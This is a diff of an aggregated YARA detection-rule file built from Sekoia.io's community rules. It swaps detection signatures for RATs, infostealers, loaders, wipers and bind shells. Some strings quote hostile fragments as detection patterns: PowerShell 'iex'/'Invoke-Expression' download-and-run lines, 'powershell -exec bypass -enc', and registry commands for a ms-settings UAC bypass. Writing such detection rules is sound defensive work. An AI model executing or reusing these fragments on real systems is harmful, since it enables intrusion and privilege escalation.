 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "142f10e519561d6552c9cb8d267280b9ede203a2f4723d904ab07217b0565bd1"
+		logic_hash = "c51d75088897aaffef904d560f750d780a0c814b89bf433a05189fbf7bb3285c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238990,36 +238924,30 @@ rule SEKOIA_Rat_Win_Babylon : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "ParadoxRAT_Client" ascii
-		$str02 = "*** in database %s ***" ascii
-		$str03 = "\\drivers\\etc\\HOSTS" ascii
-		$str04 = "Babylon RAT Client" wide
-		$str05 = "ClipBoard.txt" wide
-		$str06 = "a,ccs=UTF-16LE" wide
-		$str07 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" wide
-		$str08 = "Update Failed [OpenProcess]..." wide
-		$str09 = "DoS Already Active..." wide
-		$str10 = "File Download and Execution Failed..." wide
-		$str11 = "LgDError33x98dGetProcAddress" wide
-		$str12 = "FriendlyName" wide
-		$str13 = "@SPYNET" wide
+		$ = "bore_cli::" ascii
+		$ = "server handshake failed" ascii
+		$ = "server listening" ascii
+		$ = "connected to server" ascii
+		$ = "server requires authentication, but no client secret was provided" ascii
+		$ = "client port number too low" ascii
+		$ = "forwarding connection" ascii
+		$ = "Address of the remote server to expose local ports" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of ( $str* )
+		( uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 5 of them
 }
-rule SEKOIA_Apt_Muddywater_Muddyc2Go_Dll_Launcher_Strings : FILE
+rule SEKOIA_Guerrilla_Lemongroup : FILE
 {
 	meta:
-		description = "Detects MuddyC2Go DLL launcher"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "59756195-d842-4038-8fbf-43d26f4353bc"
-		date = "2024-03-07"
+		id = "df635b5a-a19a-48ab-9a3a-9723e265c71d"
+		date = "2023-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_muddyc2go_dll_launcher_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guerrilla_lemongroup.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca"
-		logic_hash = "b91653e313258ebd2073a398d0467800056ac94adab02c3a83aa8a379710e4e6"
+		logic_hash = "b644cb537a42217f2549f37bfe07ae0b7ba39fc248ab3d5fd870384c7684683b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239027,25 +238955,33 @@ rule SEKOIA_Apt_Muddywater_Muddyc2Go_Dll_Launcher_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "-Method GET -ErrorAction Stop;Write-Output $response.Content;iex $response.Content;"
-		$ = "GetCurrentProcess"
-		$ = "TerminateProcess"
+		$dex = { 64 65 78 0A 30 33 ?? 00 }
+		$odex = { 64 65 79 0A 30 33 ?? 00 }
+		$s2 = "data response code===" ascii
+		$s3 = "httpCon:" ascii
+		$s4 = "processName :" ascii
+		$s5 = "startListTasks......" ascii
+		$s6 = "url==" ascii
+		$s7 = "java core run ZYGOTE_PROCESS" ascii
+		$api1 = "/api.php" ascii
+		$api2 = "/event.php" ascii
+		$api3 = "/apiRS.php" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 50KB and all of them
+		($dex at 0 or $odex at 0 ) and filesize > 100KB and filesize < 5MB and 5 of ( $s* ) and 1 of ( $api* )
 }
-rule SEKOIA_Infostealer_Win_Leaf : FILE
+rule SEKOIA_Clwiper_Strings : FILE
 {
 	meta:
-		description = "Find samples of Leaf Stealer based on specific strings"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "17d8e384-1092-4f27-b4f7-c0c0f7efcaa3"
-		date = "2023-02-07"
+		id = "91e531e2-8548-460f-88a8-cc09abb901e0"
+		date = "2022-09-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_leaf.yar#L1-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/clwiper_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f8c0ff694c9f7a02613000d85a40f6b400dcca60711e589f7ccd3546f571aea6"
+		logic_hash = "b6bcd7e20b07ab8a9a54672f60a8ffe6d6bf787630f01b9dcefd1cbc78297050"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239053,75 +238989,57 @@ rule SEKOIA_Infostealer_Win_Leaf : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Leaf $tealer" ascii
-		$str02 = "KiwiFolder" ascii
-		$str03 = "key_wordsFiles" ascii
-		$str04 = "**[Click to copy](https://superfurrycdn.nl/copy/" ascii
-		$str05 = "Early_Verified_Bot_Developer" ascii
-		$str06 = "getCookie.<locals>.<genexpr>" ascii
-		$str07 = "C:\\Program Files (x86)\\Steam\\config" ascii
-		$str08 = "[crunchyroll](https://crunchyroll.com)" ascii
-		$str09 = "-m pip install" ascii
-		$str10 = "taskkill /im " ascii
-		$str11 = "/loginusers.vdf" ascii
-		$str12 = "mot_de_passe" ascii
-		$str13 = "Interesting files found on user PC" ascii
-		$str14 = "NationsGlory/Local Storage/leveldb" ascii
-		$str15 = "wppassw.txt" ascii
-		$str16 = "wpcook.txt" ascii
-		$str17 = "ProcesName < 1 >" ascii
-		$str18 = "Metamask_" ascii
+		$w1 = "missing args"
+		$w2 = "wp starts"
+		$w3 = "Total Bytez : %lld"
+		$w4 = "percent is %f spent time is %.2fs"
+		$d1 = "\\\\?\\RawDisk3"
+		$d2 = "B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		uint16be( 0 ) == 0x4d5a and ( 3 of ( $w* ) or all of ( $d* ) )
 }
-rule SEKOIA_Apt_Ivanti_Krustyloader : FILE
+rule SEKOIA_Apt_Gamaredon_Vbs_Downloader : FILE
 {
 	meta:
-		description = "Detects KrustyLoader used in the Ivanti campaign"
+		description = "Detects small VBS loader"
 		author = "Sekoia.io"
-		id = "617fdd5f-7555-49e8-b0ec-2199f017dc40"
-		date = "2024-01-29"
+		id = "13b63570-2f18-4b35-8087-9ab15c58a0d1"
+		date = "2023-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ivanti_krustyloader.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_vbs_downloader.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fe982dffcff4bec78593080d7745aeb32bc2e3b7e0df373bbbd53bc6f53cfcbf"
+		logic_hash = "e3ae516ea18f2912b7f0fb7864542ae609167fb29751b87cbf6f9cd34ec858ba"
 		score = 75
-		quality = 30
+		quality = 68
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "/proc/self/exe" ascii fullword
-		$s2 = "||||||||||||||"
-		$s3 = "/tmp/"
-		$xor = {40 80 f5}
-		$chunk_1 = {
-        66 0F EF D0
-        66 0F 6F C3
-        66 0F 73 F8 0C
-        66 0F EF C1
-        66 0F EF C2
-        66 0F EF C3
-        }
+		$s1 = "on error resume next" nocase ascii wide
+		$s2 = "String('http" nocase ascii wide
+		$s3 = "send()" nocase ascii wide
+		$s4 = ")|Invoke-Expression" nocase ascii wide
+		$s5 = "'); Invoke-Expression $" nocase ascii wide
+		$s6 = "');Invoke-Expression $" nocase ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 2MB and all of them and #xor > 2 and #chunk_1 > 6 and @s3 < @s2 and @s2 < @s3 + 300
+		$s1 and ( $s2 or $s3 ) and ( $s4 or $s5 or $s6 ) and filesize < 1KB
 }
-rule SEKOIA_Rule_Lazarus_Generic_Downloader_7C3F94702Fa7 : FILE
+rule SEKOIA_Apt_Emissarypanda_Sysupdate_Removing_Tool : FILE
 {
 	meta:
-		description = "Detects a Generic Downloader used by Lazarus"
+		description = "Detects the SysUpdate removing tool"
 		author = "Sekoia.io"
-		id = "eb0f0a91-5e72-4358-91a3-7c3f94702fa7"
-		date = "2022-08-08"
+		id = "711d059c-6229-49ef-aa20-a04d505838dc"
+		date = "2022-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rule_lazarus_generic_downloader_7c3f94702fa7.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_emissarypanda_sysupdate_removing_tool.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1ee58eb760fb74ef089f7d3eb423f314fe1c22e8c85b01eba0e965dea8c846ce"
+		logic_hash = "6a23fac99f26f4b0f9099e435ad53d9e83bf1322d190c565abf0c06dceeeaf34"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239129,28 +239047,26 @@ rule SEKOIA_Rule_Lazarus_Generic_Downloader_7C3F94702Fa7 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s%s%s%s = %s%s%s%s"
-		$ = "sec-ch-ua-mobile: ?0"
-		$ = "%s>%s"
-		$ = "d$f92&^$#FESAfaSDage#FDa"
-		$ = "Sec-Fetch-User: ?1"
+		$ = "KsWAYYYXXsFUCK" wide
+		$ = "remove Services:%s %d" wide
+		$ = "remove dir:%s %d" wide
+		$ = "remove reg %d" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 11MB and 2 of them
 }
-rule SEKOIA_Apt_Mustangpanda_Zpakage : FILE
+rule SEKOIA_Hacktool_Win_Uknowseckeylogger : FILE
 {
 	meta:
-		description = "Detect obfuscation seen in ZPAKAGE"
+		description = "Detect the uknowsec keylogger based on strings"
 		author = "Sekoia.io"
-		id = "a4767d12-5058-4a26-be62-0cec685917bd"
-		date = "2023-03-27"
+		id = "ab08136d-b1f3-4e64-b73c-e6344b610f91"
+		date = "2022-10-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_zpakage.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_uknowseckeylogger.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "711c0e83f4e626a7b54e3948b281a71915a056c5341c8f509ecba535bc199bee"
-		logic_hash = "52ad51589ca154fbf6e5829a2c80a9b811809288bed6995820a0ca8aa218d8ef"
+		logic_hash = "83a731a5b1853edcce963d458fc170206086305f3e43403c930c9633918e8ff1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239158,180 +239074,182 @@ rule SEKOIA_Apt_Mustangpanda_Zpakage : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        88 94 1D ?? ?? ?? ??
-        8A 84 1D ?? ?? ?? ??
-        83 ?? ??
-        88 84 1D ?? ?? ?? ??
-        8A 84 1D ?? ?? ?? ??
-        83 ?? ??
-        88 84 1D ?? ?? ?? ??
-        8A 84 1D ?? ?? ?? ??
-        83 ?? ??
-        88 84 1D ?? ?? ?? ??
-        0F BE 8C 1D ?? ?? ?? ??
-        0F BE 84 1D ?? ?? ?? ??
-        }
+		$str0 = "github.com/atotto/clipboard" ascii
+		$str1 = "github.com/TheTitanrain/w32" ascii
+		$str2 = "github.com/aliyun/aliyun-oss-go-sdk" ascii
+		$str3 = "golang.org/x/sys" ascii
+		$str4 = "golang.org/x/time" ascii
+		$str5 = "WSARecvWSASend[Print][Right][Shift][Sleep][debug][error]" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and filesize < 11MB and #chunk_1 > 20
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Win_Clipper_Generic : FILE
+rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022 : FILE
 {
 	meta:
-		description = "Clipper found during investigation: 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6"
+		description = "Detects tje Saitama backdoor"
 		author = "Sekoia.io"
-		id = "a94b3d01-dbc7-41e4-8d45-793bf443b1d2"
-		date = "2024-07-03"
+		id = "4ea8c27f-c441-4616-a29b-2b5dfdd3bd20"
+		date = "2022-05-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_clipper_generic.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_saitama_backdoor_may2022.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f2fb2285adb10269aaf3d028d3803775ad86833b36cf24dabb8d404a6380b505"
+		logic_hash = "b3876995fde9c26052c39859684cec05e8c1bc8e2a62946b49ed328e84499dc6"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s = { 24 72 61 6e 70 74 68 20 3d 20 69 66 20 28 28 47 65 74 2d 52 61 6e 64 6f 6d 29 20 25 20 32 29 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 22 24 72 61 6e 2e 70 73 31 22 20 7d 20 65 6c 73 65 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 41 50 50 44 41 54 41 20 22 24 72 61 6e 2e 70 73 31 22 20 7d  }
+		$ = { 7E [4] 7E [4] 59 0A 02 8E 69 06 28 [4] D1 0B 02 16 7E [4] 7E [4] 07 }
+		$ = "systeminfo | findstr" wide
+		$ = "powershell -exec bypass -enc" wide
+		$ = "SendAndReceive : {0}" wide
+		$ = "SleepSecond : Start" wide
 
 	condition:
-		filesize > 1KB and all of them
+		uint16be( 0 ) == 0x4d5a and 2 of them
 }
-
-rule SEKOIA_Downloader_Win_Andarloader : FILE
+rule SEKOIA_Apt_Aridviper_Rustsysjoker : FILE
 {
 	meta:
-		description = "Detect the AndarLoader downloader used by Andariel"
+		description = "Detects Rust Sysjoker variant via PDB path or key and Rust string"
 		author = "Sekoia.io"
-		id = "96dd737e-601c-4370-9fa6-4bbafafae203"
-		date = "2023-09-04"
+		id = "14ff3f76-0371-4b45-9864-bf69c74e60aa"
+		date = "2023-11-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_andarloader.yar#L4-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aridviper_rustsysjoker.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "33e5490b9564333c27a2c23d7f0362c582ca3bd352cafde6b334dc376fd37762"
+		logic_hash = "cb3c5d37095c27aa169a6aa61fa12972ff71877c615eaa254c3906ef10c662a9"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "02135f60f3edff0b9baa4c20715ee6a80c94f282079bf879265f5e020d37cf88"
-		hash2 = "54ed7a7430974cc2ea694f49f3e637b835dcd24aa19d66af854ad47b87068c92"
+
+	strings:
+		$Rust = "called `Option::unwrap()` on a `None` value"
+		$Key = "QQL8VJUJMABL8H5YNRC9QNEOHA"
+		$PDB = "C:\\Code\\Rust\\RustDown-Belal\\target\\release\\deps\\RustDown.pdb"
 
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b338ad077c7f5be85c33def7287198841d55af8cd1ad856fdcd16fdc78f18838" ) and filesize < 100KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and ( $PDB or ( $Rust and $Key ) )
 }
-rule SEKOIA_Apt37_Rokrat_Macho
+rule SEKOIA_Trojan_Win_Bbtok_Dll1_Sep23 : FILE
 {
 	meta:
-		description = "Detects Public key of Macho samples of RokRAT"
+		description = "Finds BBTok installation DLL file"
 		author = "Sekoia.io"
-		id = "c54fb9ae-85fa-4c36-bab9-6c6d989262ba"
-		date = "2022-09-29"
+		id = "eebed24b-24ec-4a85-852c-52d0acc9a698"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt37_rokrat_macho.yar#L1-L21"
+		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_bbtok_dll1_sep23.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "526dc4594db099ed8090a673e761f84f6dd7ce860e380214e4d3f1ec08fc2345"
+		hash = "5353956345206982af9bde55300fc405ba6e40722e8f51e8717c30ad32bc8f91"
+		logic_hash = "1b1e25f7d760d275d2ef01390c215edb1752ad65383c92a21d71d9e65da3c5f8"
 		score = 75
-		quality = 66
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 4D 49 49 42 49 6A 41 4E 42 67 6B 71 68 6B 69 47 39 77 30 42 41 51 45 46 41 41 4F 43 41 51 38 41 4D 49 49 42 43 67 4B 43 41 51 45 41 73 47 52 59 53 45 56 76 77 6D 66 42 46 4E 42 6A 4F 7A 2B 51}
-		$s2 = {70 61 78 35 72 7A 57 66 2F 4C 54 2F 79 46 55 51 41 31 7A 72 41 31 6E 6A 6A 79 49 48 72 7A 70 68 67 63 39 74 67 47 48 73 2F 37 74 73 57 70 38 65 35 64 4C 6B 41 59 73 56 47 68 57 41 50 73 6A 79}
-		$s3 = {31 67 78 30 64 72 62 64 4D 6A 6C 54 62 42 59 54 79 45 67 35 50 67 79 2F 35 4D 73 45 4E 44 64 6E 73 43 52 57 72 32 33 5A 61 4F 45 4C 76 48 48 56 56 38 43 4D 43 38 46 75 34 57 62 61 7A 38 30 4C}
-		$s4 = {47 68 67 38 69 73 56 50 45 48 43 38 48 2F 79 47 74 6A 48 50 59 46 56 65 36 6C 77 56 72 2F 4D 58 6F 4B 63 70 78 31 33 53 31 4B 38 6E 6D 44 51 4E 41 68 4D 70 54 31 61 4C 61 47 2F 36 51 69 6A 68}
-		$s5 = {57 34 50 2F 52 46 51 71 2B 46 64 69 61 33 66 46 65 68 50 67 35 44 74 59 44 39 30 72 53 33 73 64 46 4B 6D 6A 39 4E 36 4D 4F 30 2F 57 41 56 64 5A 7A 47 75 45 58 44 35 33 4C 48 7A 39 65 5A 77 52}
-		$s6 = {39 59 38 37 38 36 6E 56 44 72 6C 6D 61 35 59 43 4B 70 71 55 5A 35 63 34 36 77 57 33 67 59 57 69 33 73 59 2B 56 53 33 62 32 46 64 41 4B 43 4A 68 54 66 43 79 38 32 41 55 47 71 50 53 56 66 4C 61}
-		$s7 = {6D 51 49 44 41 51 41 42}
+		$str01 = "C:\\Windows\\System32\\rundll32.exe" wide
+		$str02 = "C:\\ProgramData\\mmd.exe" wide
+		$str03 = "REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d" wide
+		$str04 = "C:\\ProgramData\\mmd.exe \\\\" wide
+		$str05 = "\\file\\Trammy.dll" wide
+		$str06 = "Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f" wide
+		$str07 = "REG DELETE  HKCU\\Software\\Classes\\.pwn /f" wide
+		$str08 = "REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f" wide
+		$str09 = "timeout /t 3 >nul & start /MIN computerdefaults.exe" wide
+		$str10 = "set_StartInfo" ascii
+		$str11 = "set_WindowStyle" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 7 of them and filesize < 50KB
 }
-rule SEKOIA_Apt_Mustangpanda_Mqsttang_Qmagent : FILE
+rule SEKOIA_Apt_Backdoordiplomaty_Custommerlinagent_Strings : FILE
 {
 	meta:
-		description = "Detects specifics string of MQsTTang, also known as QMAGENT"
+		description = "Detects custom variant of Merlin agent used by BackdoorDiplomaty"
 		author = "Sekoia.io"
-		id = "bcf6f961-0d9b-4fbc-81d2-f5d00c68d4d5"
-		date = "2023-03-27"
+		id = "965693ba-93b8-4c52-9292-957884411968"
+		date = "2024-06-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_mqsttang_qmagent.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_backdoordiplomaty_custommerlinagent_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4e7aa53e561cad512b031240bce6ad207b80ff7438eee39cd05bb92412aaa632"
+		logic_hash = "31d13e234dc3f68f6826a5310ac38693750f896318249d04a31c5e6c8d5eba91"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "iot/server"
-		$s2 = "QMQTT::Message"
-		$s3 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
-		$command1 = "c_topic"
-		$command2 = "Alive"
-		$command3 = "msg"
-		$command4 = "ret"
+		$ = "agent.GetSpecificID"
+		$ = "agent.ExecuteCommand"
+		$ = "agent.getClient"
+		$ = "agent.SignalListen"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 10MB and all of them
 }
-rule SEKOIA_Rat_Win_Dcrat_Qwqdanchun : FILE
+rule SEKOIA_Apt_Polonium_Technocreep_Strings : FILE
 {
 	meta:
-		description = "Find DcRAT samples (qwqdanchun) based on specific strings"
+		description = "Tries to detect TechnoCreep implant"
 		author = "Sekoia.io"
-		id = "8206a410-48b3-425f-9dcb-7a528673a37a"
-		date = "2023-01-26"
+		id = "dad79df3-b081-458e-9c14-1d5e2b43ba91"
+		date = "2022-10-12"
 		modified = "2024-12-19"
-		reference = "https://github.com/qwqdanchun/DcRat"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_dcrat_qwqdanchun.yar#L1-L28"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_technocreep_strings.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e6f8664e57ecce3bd7b2af5c67d564d526b32d12218b772b0e9f53709044e14d"
+		logic_hash = "6fbd14d39f215b835c0fe7709041ca982774be42d389397d19a41fda6f7a00d1"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "DcRatByqwqdanchun" wide
-		$str02 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==" wide
-		$str03 = "Po_ng" wide
-		$str04 = "Pac_ket" wide
-		$str05 = "Perfor_mance" wide
-		$str06 = "Install_ed" wide
-		$str07 = "get_IsConnected" ascii
-		$str08 = "get_ActivatePo_ng" ascii
-		$str09 = "isVM_by_wim_temper" ascii
-		$str10 = "save_Plugin" wide
-		$str11 = "timeout 3 > NUL" wide
-		$str12 = "ProcessHacker.exe" wide
-		$str13 = "Select * from Win32_CacheMemory" wide
+		$ = "file name : " ascii wide
+		$ = "copy to : " ascii wide
+		$ = "download" ascii wide
+		$ = "persistence" ascii wide
+		$ = "/cmdResult created!" ascii wide
+		$ = "/downloadsResulat created!" ascii wide
+		$ = "Downloading will take minets..." ascii wide
+		$ = "powershell -Command \"$c1 = " ascii wide
+		$ = "Missing Parameter.. Format of command:" ascii wide
+		$ = "File Fath On Target Device Not Exists>" ascii wide
+		$ = "/MissingDownloadParameter.txt" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Downloader_Mac_Smooth_Operator : FILE
+rule SEKOIA_Unknown_7777_Xlogin : FILE
 {
 	meta:
-		description = "Detect the Smooth_Operator malware"
+		description = "Detects the xlogin bind shell and its variants"
 		author = "Sekoia.io"
-		id = "c132b3f0-f536-4a66-bcf8-2a95c258c414"
-		date = "2023-07-04"
+		id = "ce0beffc-f957-43ef-a739-f4a1099a7a67"
+		date = "2024-07-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_mac_smooth_operator.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unknown_7777_xlogin.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "031f766d6ab7d94ed7ba4324d4bdfa3fbc11986fba35487a88a1ee3aba090c82"
+		hash = "4d9067e7cf517158337123a30a9bd0e3"
+		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
+		hash = "777d6f907da38365924a0c2a12e973c5"
+		hash = "8542a3cbe232fe78baa0882736c61926"
+		logic_hash = "1c38d8019734affdebac32050097bbcf89e9069fb2145a976588eca04ecc78df"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239339,40 +239257,24 @@ rule SEKOIA_Downloader_Mac_Smooth_Operator : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s/.main_storage"
-		$ = "%s/UpdateAgent"
+		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
+		$string2 = { 2F 64 65 76 2F 6E 75 6C 6C [1-3] 2F 62 69 6E 2F 73 68 00 2D 63 }
 
 	condition:
-		uint32be( 0 ) == 0xcafebabe and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and ( ( @string2 - @string1 < 3400 ) )
 }
-rule SEKOIA_Apt_Yemen_Apk_Guardzoo : FILE
+rule SEKOIA_Infostealer_Win_Ducklogs : FILE
 {
 	meta:
-		description = "Detects Dex files containing GuardZoo strings."
+		description = "Detects DuckLogs based on specific strings"
 		author = "Sekoia.io"
-		id = "f4004e7c-2904-46ea-a3e6-2bdd3e704fea"
-		date = "2024-08-09"
+		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
